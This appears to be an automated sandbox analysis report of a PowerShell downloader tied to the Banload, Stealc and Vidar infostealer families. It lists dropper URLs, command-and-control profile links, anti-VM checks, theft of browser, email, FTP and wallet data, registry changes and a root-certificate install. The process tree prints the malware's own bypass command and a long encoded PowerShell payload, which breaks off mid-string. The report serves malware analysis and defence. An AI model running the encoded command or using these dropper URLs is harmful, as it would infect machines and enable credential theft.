banload | 5e15446118157a4109f642da012a275ce0f6203c5c8dbc8ca468c0c2c3a12425

Analysis

max time kernel
146s
max time network
125s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
18-06-2024 13:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.ps1
Size

1KB
MD5

fe729ca626d4d535d2aa601f0b3ba42e
SHA1

99ddeed15a2bd8e054e8cc734c36b148bcf7dca1
SHA256

5e15446118157a4109f642da012a275ce0f6203c5c8dbc8ca468c0c2c3a12425
SHA512

5028e95dc1e390d2bc92f945cd6ee3f2b04a5541f28cb1a5d214840bb658e96f403e04fade4075359f6922aebc3435c856d29cd10781db0aad63dafa7873484c

Score

10^/10

banload stealc vidar discovery downloader dropper evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://ghufal.answermedia.site/KB/KB66958646

exe.dropper

https://ghufal.answermedia.site/KB/post.php?status=2

exe.dropper

https://ghufal.answermedia.site/KB/post.php?status=3

Extracted

Family

stealc

rc4.plain

Extracted

Family

vidar

https://t.me/memve4erin

https://steamcommunity.com/profiles/76561199699680841

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload

Detect Vidar Stealer 5 IoCs

stealer

resource	yara_rule
behavioral3/memory/3340-174-0x0000000000C60000-0x0000000000EA9000-memory.dmp	family_vidar_v7
behavioral3/memory/3340-190-0x0000000000C60000-0x0000000000EA9000-memory.dmp	family_vidar_v7
behavioral3/memory/3340-278-0x0000000000C60000-0x0000000000EA9000-memory.dmp	family_vidar_v7
behavioral3/memory/3340-283-0x0000000000C60000-0x0000000000EA9000-memory.dmp	family_vidar_v7
behavioral3/memory/3340-290-0x0000000000C60000-0x0000000000EA9000-memory.dmp	family_vidar_v7

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ezcd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ezcd.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	456	powershell.exe
4	5028	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	ezcd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ezcd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	ezcd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ezcd.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 3 IoCs

pid	Process
4632	ezcd.exe
2392	ezcd.exe
4376	IIJEBAECGC.exe

Loads dropped DLL 7 IoCs

pid	Process
4632	ezcd.exe
4632	ezcd.exe
4632	ezcd.exe
2392	ezcd.exe
2392	ezcd.exe
2392	ezcd.exe
3340	mt2.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2392 set thread context of 1000	2392	ezcd.exe	83
PID 4376 set thread context of 3880	4376	IIJEBAECGC.exe	90

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\One Drive Elev Process.job	more.com

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
456	powershell.exe
5028	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 1 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mt2.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4920	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
224	ipconfig.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Conversion\Readable	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet\2	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Insertable\	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Version\ = "1.2"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\MiscStatus\ = "1"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Verb\1	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\gyYjrlgjkVmdE	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet\2\ = "1,1,1,1"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\pLywcMi	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\LphlflGenyO	ezcd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\kVknrulnthqa\ = "newNNbpDf]X[Szl"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\15.0.0.0\RuntimeVersion = "v2.0.50727"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\kVknrulnthqa	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\pLywcMi\ = "~BlSXfnLhLFvJ~^bs}SNeAJv`Fyxi}"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\kVknrulnthqa\ = "GkMZaW@SqbO_dLK"	ezcd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\gyYjrlgjkVmdE\ = "~OJ\\pqvFfbM@QuxD^e\|}DOsDQY"	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\LphlflGenyO	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\AuxUserType\2	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Conversion\ReadWritable	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\DefaultFile\ = "Biff8"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet\1\ = "2,1,16,1"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DocObject	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Verb\1\ = "&Open,0,2"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\ = "Microsoft Excel Chart"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\Class = "Microsoft.Office.Interop.Excel.ChartClass"	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\gyYjrlgjkVmdE	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\zTCJnL	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\pLywcMi	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\15.0.0.0\Assembly = "Microsoft.Office.Interop.Excel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\rntoyzicatx	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\zTCJnL\ = "m[CjQUjZalTEX~^UuKzdpYilOF"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocHandler32\ = "ole32.dll"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\ProgID\ = "Excel.Chart.8"	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\aCbcj	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Conversion\Readable\Main	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DefaultExtension\ = ".xls, Excel Workbook (*.xls)"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\LocalServer32\ = "C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\TypeLib\ = "{00020813-0000-0000-C000-000000000046}"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\rntoyzicatx	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet\0\ = "3,1,32,1"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\pLywcMi\ = "~BlSXfnLhLFvJ~^bs}S~eAJv`FyHi}"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\kVknrulnthqa\ = "GkM[QW@Sq`hKG`W"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\DefaultFile	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\AuxUserType\3\ = "Microsoft Excel 2003"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet\4	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DefaultIcon\ = "C:\\Program Files\\Microsoft Office\\Root\\VFS\\Windows\\Installer\\{90160000-000F-0000-1000-0000000FF1CE}\\xlicons.exe,3"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Implemented Categories\{000C0118-0000-0000-C000-000000000046}\	ezcd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\LphlflGenyO\ = "~_DEdiFi\x7fGeg\x7fp[I\|]TyUrLi"	ezcd.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\tkcbuBa	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\AuxUserType\3	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Implemented Categories	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Implemented Categories\{000C0118-0000-0000-C000-000000000046}	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\LocalServer32	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\zTCJnL	ezcd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\kVknrulnthqa\ = "newO~bpDf_\x7fOpVp"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\DataFormats\GetSet\0	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\15.0.0.0	ezcd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\{8934AEBA-278E-13D1-B2E4-0060975B8649}\zTCJnL\ = "\|ZzOuoAc[^Qn_\|@xdaoNndLS\\m"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\RuntimeVersion = "v2.0.50727"	ezcd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\PersistentHandler\ = "{98de59a0-d175-11cd-a7bd-00006b827d94}"	ezcd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}	ezcd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	mt2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mt2.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\ProgramData\TEMP:8934AEBA	ezcd.exe
File opened for modification	C:\ProgramData\TEMP:8934AEBA	ezcd.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
456	powershell.exe
456	powershell.exe
5028	powershell.exe
5028	powershell.exe
4632	ezcd.exe
2392	ezcd.exe
2392	ezcd.exe
1000	cmd.exe
1000	cmd.exe
3340	mt2.exe
3340	mt2.exe
4376	IIJEBAECGC.exe
4376	IIJEBAECGC.exe
3880	more.com
3880	more.com
3340	mt2.exe
3340	mt2.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2392	ezcd.exe
1000	cmd.exe
4376	IIJEBAECGC.exe
3880	more.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	456	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 456 wrote to memory of 224	456	powershell.exe	78
PID 456 wrote to memory of 224	456	powershell.exe	78
PID 456 wrote to memory of 5028	456	powershell.exe	79
PID 456 wrote to memory of 5028	456	powershell.exe	79
PID 5028 wrote to memory of 4632	5028	powershell.exe	81
PID 5028 wrote to memory of 4632	5028	powershell.exe	81
PID 4632 wrote to memory of 2392	4632	ezcd.exe	82
PID 4632 wrote to memory of 2392	4632	ezcd.exe	82
PID 2392 wrote to memory of 1000	2392	ezcd.exe	83
PID 2392 wrote to memory of 1000	2392	ezcd.exe	83
PID 2392 wrote to memory of 1000	2392	ezcd.exe	83
PID 2392 wrote to memory of 1000	2392	ezcd.exe	83
PID 1000 wrote to memory of 3340	1000	cmd.exe	85
PID 1000 wrote to memory of 3340	1000	cmd.exe	85
PID 1000 wrote to memory of 3340	1000	cmd.exe	85
PID 1000 wrote to memory of 3340	1000	cmd.exe	85
PID 1000 wrote to memory of 3340	1000	cmd.exe	85
PID 3340 wrote to memory of 4376	3340	mt2.exe	87
PID 3340 wrote to memory of 4376	3340	mt2.exe	87
PID 4376 wrote to memory of 3880	4376	IIJEBAECGC.exe	90
PID 4376 wrote to memory of 3880	4376	IIJEBAECGC.exe	90
PID 4376 wrote to memory of 3880	4376	IIJEBAECGC.exe	90
PID 4376 wrote to memory of 3880	4376	IIJEBAECGC.exe	90
PID 3340 wrote to memory of 1224	3340	mt2.exe	93
PID 3340 wrote to memory of 1224	3340	mt2.exe	93
PID 3340 wrote to memory of 1224	3340	mt2.exe	93
PID 1224 wrote to memory of 4920	1224	cmd.exe	95
PID 1224 wrote to memory of 4920	1224	cmd.exe	95
PID 1224 wrote to memory of 4920	1224	cmd.exe	95
PID 3880 wrote to memory of 5080	3880	more.com	96
PID 3880 wrote to memory of 5080	3880	more.com	96
PID 3880 wrote to memory of 5080	3880	more.com	96
PID 3880 wrote to memory of 5080	3880	more.com	96
PID 3880 wrote to memory of 5080	3880	more.com	96

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\New Text Document.ps1"
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:456
- C:\Windows\system32\ipconfig.exe
  "C:\Windows\system32\ipconfig.exe" /flushdns
  2⤵
  - Gathers network information
  PID:224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JAB3ADgAVgAyAHAAWgAgAD0AIAB7AAoAIAAgACAAIAAkAHAANABZADcAawBMACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AaQBuAGkAbQB1AG0AIAAzADEAMAAwACAALQBNAGEAeABpAG0AdQBtACAANQAxADAAMAA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgACQAcAA0AFkANwBrAEwACgAgACAAIAAgAFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAIAAtAGIAbwByACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADEAIAAtAGIAbwByACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFMAcwBsADMACgAgACAAIAAgACQAdQAzAE4ANgBiAEMAIAA9ACAAOAA7ACAAJABzADUAWAA5AGUAUgAgAD0AIAAxADUAOwAgACQAYQA4AFQANABtAFcAIAA9ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AaQBtAHUAbQAgACQAdQAzAE4ANgBiAEMAIAAtAE0AYQB4AGkAbQB1AG0AIAAoACQAcwA1AFgAOQBlAFIAIAArACAAMQApAAoAIAAgACAAIAAkAG8AOQBMADEAcQBKACAAPQAgACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABxAHIAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUQBSAFMAVABVAFYAVwBYAFkAWgAwADEAMgAzADQANQA2ADcAOAA5ACcACgAgACAAIAAgACQAZAA1AEsAOAB4AFEAIAA9ACAALQBqAG8AaQBuACAAKAAxAC4ALgAkAGEAOABUADQAbQBXACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAG8AOQBMADEAcQBKAC4AVABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAgAH0AKQAKACAAIAAgACAAJAByADcAUAAzAGMASAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgAkAGQANQBLADgAeABRACIAOwAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAHIANwBQADMAYwBIACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoAIAAgACAAIAAkAG0ANgBFADQAagBWACAAPQAgAC0AagBvAGkAbgAgACgAMQAuAC4AJABhADgAVAA0AG0AVwAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABvADkATAAxAHEASgAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB9ACkAIAArACAAJwAuAHoAaQBwACcACgAgACAAIAAgACQAegAzAEcAOAB3AEYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBIAFIAMABjAEgATQA2AEwAeQA5AG4AYQBIAFYAbQBZAFcAdwB1AFkAVwA1AHoAZAAyAFYAeQBiAFcAVgBrAGEAVwBFAHUAYwAyAGwAMABaAFMAOQBMAFEAa